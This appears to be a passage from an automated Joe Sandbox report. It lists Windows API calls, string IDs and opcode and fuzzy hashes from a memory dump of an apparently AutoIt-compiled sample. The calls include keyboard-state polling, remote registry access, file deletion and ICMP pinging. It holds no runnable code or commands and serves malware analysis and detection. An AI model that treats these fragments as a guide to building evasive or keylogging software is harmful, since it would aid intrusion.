                                                                                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU$|E
                                                                                                                  • API String ID: 3964851224-875377453
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00DE3C64,00000010,00000000,Bad directive syntax error,00E0DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 00DB32D1
                                                                                                                  • LoadStringW.USER32(00000000,?,00DE3C64,00000010), ref: 00DB32D8
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                  • _wprintf.LIBCMT ref: 00DB3309
                                                                                                                  • __swprintf.LIBCMT ref: 00DB332B
                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00DB3395
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:$"
                                                                                                                  • API String ID: 1506413516-3476811254
                                                                                                                  APIs
                                                                                                                  • LoadStringW.USER32(00000066,?,00000FFF), ref: 00DBD567
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                  • LoadStringW.USER32(?,?,00000FFF,?), ref: 00DBD589
                                                                                                                  • __swprintf.LIBCMT ref: 00DBD5DC
                                                                                                                  • _wprintf.LIBCMT ref: 00DBD68D
                                                                                                                  • _wprintf.LIBCMT ref: 00DBD6AB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                  • API String ID: 2116804098-2391861430
                                                                                                                  APIs
                                                                                                                  • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00DBD37F
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                  • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00DBD3A0
                                                                                                                  • __swprintf.LIBCMT ref: 00DBD3F3
                                                                                                                  • _wprintf.LIBCMT ref: 00DBD499
                                                                                                                  • _wprintf.LIBCMT ref: 00DBD4B7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                  • API String ID: 2116804098-3420473620
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D77E53: _memmove.LIBCMT ref: 00D77EB9
                                                                                                                  • _memset.LIBCMT ref: 00DAAF74
                                                                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00DAAFA9
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00DAAFC5
                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00DAAFE1
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00DAB00B
                                                                                                                  • CLSIDFromString.COMBASE(?,?), ref: 00DAB033
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00DAB03E
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00DAB043
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                  • API String ID: 1411258926-22481851
                                                                                                                  APIs
                                                                                                                  • __swprintf.LIBCMT ref: 00DB7226
                                                                                                                  • __swprintf.LIBCMT ref: 00DB7233
                                                                                                                    • Part of subcall function 00D9234B: __woutput_l.LIBCMT ref: 00D923A4
                                                                                                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 00DB725D
                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00DB7269
                                                                                                                  • LockResource.KERNEL32(00000000), ref: 00DB7276
                                                                                                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 00DB7296
                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00DB72A8
                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00DB72B7
                                                                                                                  • LockResource.KERNEL32(?), ref: 00DB72C3
                                                                                                                  • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00DB7322
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                  • String ID: L6
                                                                                                                  • API String ID: 1433390588-4199682035
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D77E53: _memmove.LIBCMT ref: 00D77EB9
                                                                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00DB843F
                                                                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00DB8455
                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DB8466
                                                                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00DB8478
                                                                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00DB8489
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: SendString$_memmove
                                                                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                  • API String ID: 2279737902-1007645807
                                                                                                                  • Opcode ID: a8272fdae11ec8b4d4a52fef862f689079f1a193512a0ef42ef24f442f64c86b
                                                                                                                  • Instruction ID: 1087c2764b2724f15013ae4739d32d731e5a7ed5bd821281f028743309367b6d
                                                                                                                  • Opcode Fuzzy Hash: a8272fdae11ec8b4d4a52fef862f689079f1a193512a0ef42ef24f442f64c86b
                                                                                                                  • Instruction Fuzzy Hash: F511C86164026D79D724A7B1DC46DFF7B7CEB91B00F04481AB412B60D0EEA05A44CAB0
                                                                                                                  APIs
                                                                                                                  • timeGetTime.WINMM ref: 00DB809C
                                                                                                                    • Part of subcall function 00D8E3A5: timeGetTime.WINMM(?,75A4B400,00DE6163), ref: 00D8E3A9
                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 00DB80C8
                                                                                                                  • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 00DB80EC
                                                                                                                  • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00DB810E
                                                                                                                  • SetActiveWindow.USER32 ref: 00DB812D
                                                                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00DB813B
                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00DB815A
                                                                                                                  • Sleep.KERNEL32(000000FA), ref: 00DB8165
                                                                                                                  • IsWindow.USER32 ref: 00DB8171
                                                                                                                  • EndDialog.USER32(00000000), ref: 00DB8182
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                  • String ID: BUTTON
                                                                                                                  • API String ID: 1194449130-3405671355
                                                                                                                  • Opcode ID: 0252df46216f60b782377d64102a8b30175b0457c6d82cbde0464ee9a9f6a95c
                                                                                                                  • Instruction ID: 7184918e17f48173b55175faf8fff6da56d1a766bb58ca263cc868753c839be3
                                                                                                                  • Opcode Fuzzy Hash: 0252df46216f60b782377d64102a8b30175b0457c6d82cbde0464ee9a9f6a95c
                                                                                                                  • Instruction Fuzzy Hash: A2211D70200309EFE7126B76AC89E663F6FE755389B084115F526D6261CE768D09DB31
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DBC6A0: __time64.LIBCMT ref: 00DBC6AA
                                                                                                                    • Part of subcall function 00D741A7: _fseek.LIBCMT ref: 00D741BF
                                                                                                                  • __wsplitpath.LIBCMT ref: 00DBC96F
                                                                                                                    • Part of subcall function 00D9297D: __wsplitpath_helper.LIBCMT ref: 00D929BD
                                                                                                                  • _wcscpy.LIBCMT ref: 00DBC982
                                                                                                                  • _wcscat.LIBCMT ref: 00DBC995
                                                                                                                  • __wsplitpath.LIBCMT ref: 00DBC9BA
                                                                                                                  • _wcscat.LIBCMT ref: 00DBC9D0
                                                                                                                  • _wcscat.LIBCMT ref: 00DBC9E3
                                                                                                                    • Part of subcall function 00DBC6E4: _memmove.LIBCMT ref: 00DBC71D
                                                                                                                    • Part of subcall function 00DBC6E4: _memmove.LIBCMT ref: 00DBC72C
                                                                                                                  • _wcscmp.LIBCMT ref: 00DBC92A
                                                                                                                    • Part of subcall function 00DBCE59: _wcscmp.LIBCMT ref: 00DBCF49
                                                                                                                    • Part of subcall function 00DBCE59: _wcscmp.LIBCMT ref: 00DBCF5C
                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00DBCB8D
                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DBCC24
                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DBCC3A
                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DBCC4B
                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DBCC5D
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 152968663-0
                                                                                                                  • Opcode ID: 511b8e962589e8f52b039ff048e177f95266ca507c84b654f812471de0b9a6f4
                                                                                                                  • Instruction ID: ef49fe4aca5bd5518818dc1974d1657398d2a68910a676495a6e50183f65c218
                                                                                                                  • Opcode Fuzzy Hash: 511b8e962589e8f52b039ff048e177f95266ca507c84b654f812471de0b9a6f4
                                                                                                                  • Instruction Fuzzy Hash: E1C10CB1900219AEDF11DF95CC81EEEBBB9EF59310F0040AAF619E6151E7709A84CF75
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3566271842-0
                                                                                                                  • Opcode ID: 9adbc361ee682d8c9feeb0598374fca77206f505f11a31683e242103412d03cf
                                                                                                                  • Instruction ID: 9fc002de2751ad29c6fbf88495d95fb3b5ed80adacf72d6e0a23c8dc8a7572d5
                                                                                                                  • Opcode Fuzzy Hash: 9adbc361ee682d8c9feeb0598374fca77206f505f11a31683e242103412d03cf
                                                                                                                  • Instruction Fuzzy Hash: 5671DC75900219EFDB10DFA4C888E9EB7B9EF48314F148499E919EB251DB74AE40CFA0
                                                                                                                  APIs
                                                                                                                  • GetKeyboardState.USER32(?), ref: 00DB3908
                                                                                                                  • SetKeyboardState.USER32(?), ref: 00DB3973
                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00DB3993
                                                                                                                  • GetKeyState.USER32(000000A0), ref: 00DB39AA
                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00DB39D9
                                                                                                                  • GetKeyState.USER32(000000A1), ref: 00DB39EA
                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00DB3A16
                                                                                                                  • GetKeyState.USER32(00000011), ref: 00DB3A24
                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00DB3A4D
                                                                                                                  • GetKeyState.USER32(00000012), ref: 00DB3A5B
                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00DB3A84
                                                                                                                  • GetKeyState.USER32(0000005B), ref: 00DB3A92
                                                                                                                  Similarity
                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 541375521-0
                                                                                                                  • Opcode ID: 3a8b7e3ec5b064e1ebd247907d539d35d6b55a508c79efd5936f35463f97f741
                                                                                                                  • Instruction ID: 3b221b92ac833e3f05e5eedc481e41280527ea37bda4ecd42888dcc22b2b4ca6
                                                                                                                  • Opcode Fuzzy Hash: 3a8b7e3ec5b064e1ebd247907d539d35d6b55a508c79efd5936f35463f97f741
                                                                                                                  • Instruction Fuzzy Hash: 8151E724A04784A9FB35EBA488117EABFB49F01740F4C858DD5C35A1C3DA94DB8CDB72
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00DAFB19
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00DAFB2B
                                                                                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00DAFB89
                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00DAFB94
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00DAFBA6
                                                                                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00DAFBFC
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00DAFC0A
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00DAFC1B
                                                                                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00DAFC5E
                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00DAFC6C
                                                                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00DAFC89
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00DAFC96
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3096461208-0
                                                                                                                  • Opcode ID: 406653647ead01cc550e8114a8b412ee84f545725dec6b9c52facc5cf0c2caaf
                                                                                                                  • Instruction ID: 78249b7066a8268ebc827b8b6291559bb9c377c7648ee11111a2fdddc12caa26
                                                                                                                  • Opcode Fuzzy Hash: 406653647ead01cc550e8114a8b412ee84f545725dec6b9c52facc5cf0c2caaf
                                                                                                                  • Instruction Fuzzy Hash: 1A510F71B00309AFDB18CFA9DD95ABEBBBAEB89311F148569B915D7390D7709D00CB20
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8B155: GetWindowLongW.USER32(?,000000EB), ref: 00D8B166
                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00D8B067
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ColorLongWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 259745315-0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 136442275-0
                                                                                                                  APIs
                                                                                                                  • __swprintf.LIBCMT ref: 00D784E5
                                                                                                                  • __itow.LIBCMT ref: 00D78519
                                                                                                                    • Part of subcall function 00D92177: _xtow@16.LIBCMT ref: 00D92198
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __itow__swprintf_xtow@16
                                                                                                                  • String ID: %.15g$0x%p$False$True
                                                                                                                  • API String ID: 1502193981-2263619337
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00D95CCA
                                                                                                                    • Part of subcall function 00D9889E: __getptd_noexit.LIBCMT ref: 00D9889E
                                                                                                                  • __gmtime64_s.LIBCMT ref: 00D95D63
                                                                                                                  • __gmtime64_s.LIBCMT ref: 00D95D99
                                                                                                                  • __gmtime64_s.LIBCMT ref: 00D95DB6
                                                                                                                  • __allrem.LIBCMT ref: 00D95E0C
                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D95E28
                                                                                                                  • __allrem.LIBCMT ref: 00D95E3F
                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D95E5D
                                                                                                                  • __allrem.LIBCMT ref: 00D95E74
                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D95E92
                                                                                                                  • __invoke_watson.LIBCMT ref: 00D95F03
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 384356119-0
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00DB5816
                                                                                                                  • GetMenuItemInfoW.USER32(00E318F0,000000FF,00000000,00000030), ref: 00DB5877
                                                                                                                  • SetMenuItemInfoW.USER32(00E318F0,00000004,00000000,00000030), ref: 00DB58AD
                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 00DB58BF
                                                                                                                  • GetMenuItemCount.USER32(?), ref: 00DB5903
                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00DB591F
                                                                                                                  • GetMenuItemID.USER32(?,-00000001), ref: 00DB5949
                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 00DB598E
                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00DB59D4
                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DB59E8
                                                                                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DB5A09
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4176008265-0
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00DD9AA5
                                                                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00DD9AA8
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00DD9ACC
                                                                                                                  • _memset.LIBCMT ref: 00DD9ADD
                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00DD9AEF
                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00DD9B67
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$LongWindow_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 830647256-0
                                                                                                                  APIs
                                                                                                                  • GetKeyboardState.USER32(?), ref: 00DB3591
                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00DB3612
                                                                                                                  • GetKeyState.USER32(000000A0), ref: 00DB362D
                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00DB3647
                                                                                                                  • GetKeyState.USER32(000000A1), ref: 00DB365C
                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00DB3674
                                                                                                                  • GetKeyState.USER32(00000011), ref: 00DB3686
                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00DB369E
                                                                                                                  • GetKeyState.USER32(00000012), ref: 00DB36B0
                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00DB36C8
                                                                                                                  • GetKeyState.USER32(0000005B), ref: 00DB36DA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 541375521-0
                                                                                                                  • Opcode ID: f8f21bfb957462d3dc7473348b78b0dc57593f21397cc046948669e6655021f0
                                                                                                                  • Instruction ID: 32b92f11365b636359b0f51d84764717929a6d42846886f3adbca6fe4b07a41a
                                                                                                                  • Opcode Fuzzy Hash: f8f21bfb957462d3dc7473348b78b0dc57593f21397cc046948669e6655021f0
                                                                                                                  • Instruction Fuzzy Hash: 0F4180609087C9BDFF319B6488143F5BBE16B12344F4C8059D9C7463C2EAA49BC8DBB2
                                                                                                                  APIs
                                                                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00DAA2AA
                                                                                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 00DAA2F5
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00DAA307
                                                                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00DAA327
                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00DAA36A
                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00DAA37E
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00DAA393
                                                                                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 00DAA3A0
                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DAA3A9
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00DAA3BB
                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DAA3C6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2706829360-0
                                                                                                                  • Opcode ID: d8d427a435cfefbbcab9771bc7bee498b85dd3163c493ac7f0fddf7a8d312e80
                                                                                                                  • Instruction ID: dbf6b9bb73e3365149c27e1850c7e1afccc503c5f0d3732def6b27bfa1175d1a
                                                                                                                  • Opcode Fuzzy Hash: d8d427a435cfefbbcab9771bc7bee498b85dd3163c493ac7f0fddf7a8d312e80
                                                                                                                  • Instruction Fuzzy Hash: A0412D71900219AFCB01DFE8D8849EEBBBAFF49314F008065E501E3251DB34AA45CBB1
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D784A6: __swprintf.LIBCMT ref: 00D784E5
                                                                                                                    • Part of subcall function 00D784A6: __itow.LIBCMT ref: 00D78519
                                                                                                                  • CoInitialize.OLE32 ref: 00DCB298
                                                                                                                  • CoUninitialize.COMBASE ref: 00DCB2A3
                                                                                                                  • CoCreateInstance.COMBASE(?,00000000,00000017,00DFD8FC,?), ref: 00DCB303
                                                                                                                  • IIDFromString.COMBASE(?,?), ref: 00DCB376
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00DCB410
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00DCB471
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                  • API String ID: 834269672-1287834457
                                                                                                                  • Opcode ID: 1a4dd4f20a1de41f8afd075f43ab2e13f47d48a32a9d44b07374b2453025705d
                                                                                                                  • Instruction ID: 14d4cb9650db5a81c18ba6aab90449f081b4e21b9d82d81f8f2b39c7836051bb
                                                                                                                  • Opcode Fuzzy Hash: 1a4dd4f20a1de41f8afd075f43ab2e13f47d48a32a9d44b07374b2453025705d
                                                                                                                  • Instruction Fuzzy Hash: 6D615870208312AFC710DF64C886F6AB7E9EF89724F04451EF9859B291D770E948CBB2
                                                                                                                  APIs
                                                                                                                  • WSAStartup.WS2_32(00000101,?), ref: 00DC86F5
                                                                                                                  • inet_addr.WS2_32(?), ref: 00DC873A
                                                                                                                  • gethostbyname.WS2_32(?), ref: 00DC8746
                                                                                                                  • IcmpCreateFile.IPHLPAPI ref: 00DC8754
                                                                                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00DC87C4
                                                                                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00DC87DA
                                                                                                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00DC884F
                                                                                                                  • WSACleanup.WS2_32 ref: 00DC8855
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                  • String ID: Ping
                                                                                                                  • API String ID: 1028309954-2246546115
                                                                                                                  • Opcode ID: fe87e3201805ea764a65d6a52bde86b0fd9df9b507aaf0ce781f5e17aa7e1dde
                                                                                                                  • Instruction ID: ec7380f1a282f776bf6c5fbfbe412c7a1d9dfbbe097d3271d4e24f8d8b5f6d77
                                                                                                                  • Opcode Fuzzy Hash: fe87e3201805ea764a65d6a52bde86b0fd9df9b507aaf0ce781f5e17aa7e1dde
                                                                                                                  • Instruction Fuzzy Hash: 66518031604302AFD721AF25DC45F6ABBE5EF48720F148529F59ADB2A1EB70E800DB71
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00DD9C68
                                                                                                                  • CreateMenu.USER32 ref: 00DD9C83
                                                                                                                  • SetMenu.USER32(?,00000000), ref: 00DD9C92
                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DD9D1F
